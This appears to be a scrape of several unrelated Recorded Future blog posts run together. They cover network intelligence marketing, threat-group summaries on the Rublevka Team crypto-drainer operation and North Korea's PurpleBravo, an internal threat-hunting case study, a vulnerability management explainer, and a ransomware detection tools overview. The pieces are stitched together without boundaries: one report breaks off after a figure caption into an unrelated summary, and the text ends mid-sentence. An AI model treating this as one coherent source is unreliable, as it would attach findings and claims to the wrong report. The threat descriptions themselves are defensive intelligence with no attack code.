The Problem with Pre-Packaged Intelligence

Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.

The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.

Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you investigate what matters to your organization using your own selectors, questions, and mission requirements.

What Network Intelligence Actually Means

Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while maintaining strict ethical boundaries and data minimization standards.

At Recorded Future, our network intelligence query capability provides this access to global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to track adversary infrastructure at national scale.

What This Means in Practice

Consider what changes when your security operations can query global network intelligence.

Faster SOC Triage

Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.

Targeted or Opportunistic? Now You'll Know

When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.

Fraud Infrastructure Exposed

Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.

Attribution That Actually Holds Up

Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern of life based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.

Integration Into Security Workflows

Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.

When Expertise Becomes Essential

For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.

Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.

The Compliance Framework That Enables Trust

Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy and must avoid surveillance, profiling of individuals, or political targeting. Access is invitation-only, requiring vetting and agreement to specific terms of use.

These aren't just policies but foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while maintaining appropriate boundaries.

Moving Forward

The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.

Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.

What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.

Uncertainty has become the operating environment for business. And this year, fragmentation is driving it.

The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.

But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.

Today, Recorded Future's Insikt Group releases the 2026 State of Security report, our most comprehensive annual analysis of the forces shaping global security.

Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.

The End of Stability as a Baseline Assumption

Figure 1: 2025 redefined international relations (Source: Recorded Future)

Executive Summary

Insikt Group has identified a major cybercriminal operation specializing in large-scale cryptocurrency theft, operating under the moniker “Rublevka Team”. Since its inception in 2023, the threat group has generated over $10 million through affiliate-driven wallet draining campaigns. Rublevka Team is an example of a “traffer team,” composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages. Unlike traditional malware-based approaches such as those used by the traffer teams Marko Polo and CrazyEvil (previously identified by Insikt Group, both of which distributed infostealer malware), Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions. Their infrastructure is fully automated and scalable, offering affiliates access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. By lowering the technical barrier to entry, Rublevka Team has built an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight.

This structure poses a growing threat to cryptocurrency platforms, fintech providers, and brands whose identities are being impersonated. Organizations that facilitate blockchain transactions, particularly fintech firms, exchanges, or wallet providers, face elevated reputational and legal risks if customers fall victim to these scams. Even if the victim’s compromise occurs outside a firm’s platform, failure to detect spoofed landing pages or fraudulent referrals can trigger consumer backlash, loss of trust, or regulatory scrutiny around customer protections and Know Your Customer (KYC) enforcement. The threat group’s agility — evidenced by its use of frequently rotating domains, targeting lower-cost chains like Solana (SOL), and exploiting Remote Procedure Call (RPC) APIs — undermines traditional fraud detection and domain takedown efforts. Their model mirrors ransomware-as-a-service (RaaS) operations, signaling a continuation of the broader shift toward scalable, service-based cybercrime that organizations must proactively monitor, disrupt, and defend against to protect customers and maintain trust.

Key Findings

• The objective of a Rublevka Team scam is to create an attractive SOL-based offer, such as a promotion or an airdrop event, generate traffic to the lure via social media or advertisements, and trick a user into connecting their wallet to the website and signing a transaction that drains their wallet.
• As of writing, Rublevka Team’s primary Telegram channel has approximately 7,000 members. Over 240,000 messages have been posted to Rublevka Team’s automated “profits” channel, indicating at least 240,000 successful wallet drains, with transactions ranging from $0.16 to over $20,000.
• Rublevka Team offers a custom JavaScript drainer embedded into their landing pages, which exfiltrates victims’ SOL assets by draining held tokens. The drainer is compatible with over 90 SOL wallet types.
• The threat group’s infrastructure is fully automated via Telegram bots, offering affiliates tools for landing page creation, campaign tracking, cloaking, and distributed denial-of-service (DDoS) protection.
• The drainer campaign, active since 2023, leverages spoofed versions of legitimate services such as Phantom, Bitget, and Jito to maximize user trust and conversion

Key Takeaways:

• Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.
• Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.
• Team members now run 15-20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.
• During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.
• A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.

Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team

The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.

That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.

The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.

The challenge: Inconsistent and analyst-dependent threat hunting

Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."

This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.

The transformation: Unified, repeatable threat hunting

Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."

The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."

Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."

Real-world impact: Upskilling junior analysts and enabling rapid response

According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.

First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.

Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.

Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background,” he says. “We get our results, and then they can do research in the app to shore up the findings."

Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.

That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.

The advantage of a single pane of glass

Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."

This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.

Why the Customer Zero experience matters

Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.

Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."

We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.

Learn more about Autonomous Threat Operations by clicking here, or start operationalizing your threat intelligence now by booking a custom demo.

Executive Summary

PurpleBravo is a North Korean state-sponsored threat group that overlaps with the “Contagious Interview” campaign first documented in November 2023. It targets software developers, especially in the software development and cryptocurrency verticals, via fake recruiter outreach, interview coding tests, and ClickFix prompts. Activity throughout 2025 has linked multiple fraudulent LinkedIn personas to PurpleBravo through malicious GitHub repositories and fictitious lure brands. The group’s tool set includes BeaverTail (a JavaScript infostealer and loader) and multi-platform remote access trojans (RATs), specifically, PyLangGhost and GolangGhost, optimized for stealing browser credentials and cryptocurrency wallet information.

Based on Recorded Future® Network Intelligence, Insikt Group identified 3,136 individual IP addresses concentrated in South Asia and North America linked to likely targets of PurpleBravo activity from August 2024 to September 2025. Twenty potential victim organizations were observed across the AI, cryptocurrency, financial services, IT services, marketing, and software development verticals in Europe, South Asia, the Middle East, and Central America. In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target. Insikt Group observed PurpleBravo administering command-and-control (C2) servers via Astrill VPN and from IP ranges in China, with BeaverTail and GolangGhost C2 servers hosted across seventeen distinct providers.

Insikt Group distinguishes PurpleBravo (Contagious Interview) from PurpleDelta (North Korean IT workers) but has documented meaningful intersections. This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity.

PurpleBravo presents an overlooked threat to the IT software supply chain. Because many targets are in the IT services and staff-augmentation industries with large public customer bases, compromises can propagate downstream to their customers. This campaign poses an acute software supply-chain risk to organizations that outsource development, particularly in regions where PurpleBravo concentrates its fictitious recruitment efforts.

Key Findings

• PurpleBravo employs a combination of fictitious personas, organizations, and websites to distribute malware to unsuspecting job seekers in the software development industry. Candidates sometimes use their corporate devices, thereby compromising their employers' security.
• PurpleBravo uses a variety of custom and open-source malware and tools in its operations, including BeaverTail, InvisibleFerret, GolangGhost, and PylangGhost.
• Using Recorded Future Network Intelligence, Insikt Group identified 3,136 individual IP addresses linked to likely targets of PurpleBravo activity and twenty potential victim organizations in the AI, cryptocurrency, financial services, IT services, marketing, and software development industries.
• Insikt Group has observed multiple points of overlap between PurpleBravo and PurpleDelta, Recorded Future’s designation for North Korean IT workers, indicating that some individuals may be active in both operations.
• PurpleBravo’s heavy targeting of the IT and software development industries in South Asia presents an overlooked and acute supply-chain risk to organizations that contract or outsource their IT services work.

Key Takeaways:

• Traditional vulnerability management tools can no longer keep up with the speed of modern exploitation—threat context is now mandatory.
• Threat and Vulnerability Management (TVM) systems unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.
• Static CVSS scores fail to reflect exploitation likelihood; intelligence-driven, dynamic risk scoring is essential in 2026.
• Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste, enhancing detection and remediation while reducing alert fatigue.

Why Threat and Vulnerability Management Must Evolve in 2026

Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.

Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.

Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert-fatigue.

In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using intelligence-driven TVM systems.

The Core Problem: Alert Fatigue and Prioritization Failure

As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.

Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these challenges of prioritization. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.

However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:

• Is exploit code available?
• Is the vulnerability actively exploited?
• Are threat actors discussing or operationalizing it?

As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.

At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.

Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:

• Operational drag and burnout
• Delayed remediation of truly dangerous vulnerabilities
• Increased business risk despite increased effort
• Fractured security operations

Both individually, and in the aggregate, these side-effects come at a significant detriment to organizational security. And as the number and diversity of CVEs continues to expand, the greater that cost becomes. Moving forward, organizations must find a better way.

The Evolving Threat Landscape Demands a New Approach

Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.

Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.

At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an integrated approach between the two.

In short, a vulnerability is a technical weakness, while a threat is an actor, campaign or event at work exploiting that weakness. In order to be truly effective, modern threat vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.

What Is Threat and Vulnerability Management (TVM)?

Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:

• Active exploitation
• Threat actor behavior
• Asset criticality

TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and close-loop remediation and validation.

This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.

The Five Core Pillars of Modern TVM Systems

As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where vulnerabilities are exposed by the day, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equally. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.

1. Continuous Asset Discovery & Inventory

Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.

Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.

2. Vulnerability Assessment & Scoring

TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.

3. External Threat Context Enrichment

This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.

Vulnerabilities are mapped to known threat actors, active exploitation, and MITRE ATT&CK® techniques, ultimately transforming raw findings into actionable intelligence.

4. Risk-Based Prioritization (RBVM)

Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.

5. Automated Remediation & Verification

Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.

These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.

Stop Patching Everything — Use Intelligence to Prioritize Real Risk

The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.

Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.

Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.

The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.

See Your Risk Like an Attacker: The Full Attack Surface View

In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.

1. The Visibility Gap: Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.
2. Attack Surface Intelligence Explained: Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.
3. Connecting the Dots with Vulnerability Tools: When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.

Three Strategic Recommendations for Security Leaders

Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.

1. Bridge the Gap Between Security and IT

Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.

2. Embrace Automation and Workflow Integration

Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.

3. Measure What Matters — Time-to-Remediate (TTR)

Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.

The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy

Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.

Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.

Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.

By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.

Key Takeaways

• Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.
• The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.
• Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.
• Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.

Introduction

The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.

The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the 2025 Verizon Data Breach Investigations Report. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.

This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).

The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.

The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.

The Ransomware Detection Tool Landscape: Three Pillars of Defense

Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.

1. Endpoint and Extended Detection and Response (EDR/XDR) Tools

EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.

Core Functionality

EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.

How Threat Intelligence Enhances EDR/XDR

Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.

Example Tools

• CrowdStrike Falcon delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.
• Microsoft Defender XDR integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.
• SentinelOne employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.

2. Network Detection and Response (NDR) Tools

While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.

Core Functionality

NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.

How Threat Intelligence Improves NDR and Deception

Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.

Example Tools

• Vectra AI specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.
• ExtraHop Reveal(x) provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.
• Illusive (now part of Zscaler) deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.

3. Threat Intelligence Tools

The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.

Core Functionality

Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.

How Threat Intelligence Strengthens Ransomware Detection

These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:

• Threat Mapping: Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped using their TTPs to determine the intent and opportunity of carrying out a successful attack against your business.
• Infrastructure Tracking: Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.
• Variant Identification: Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.
• Exploitation Intelligence: Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.
• Risk Scoring: Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.

Example Tools

• Recorded Future delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.
• Flashpoint specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.
• Google Threat Intelligence (formerly Mandiant) combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.

Choosing the Right Ransomware Detection Tools

Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.

Security leaders should prioritize:

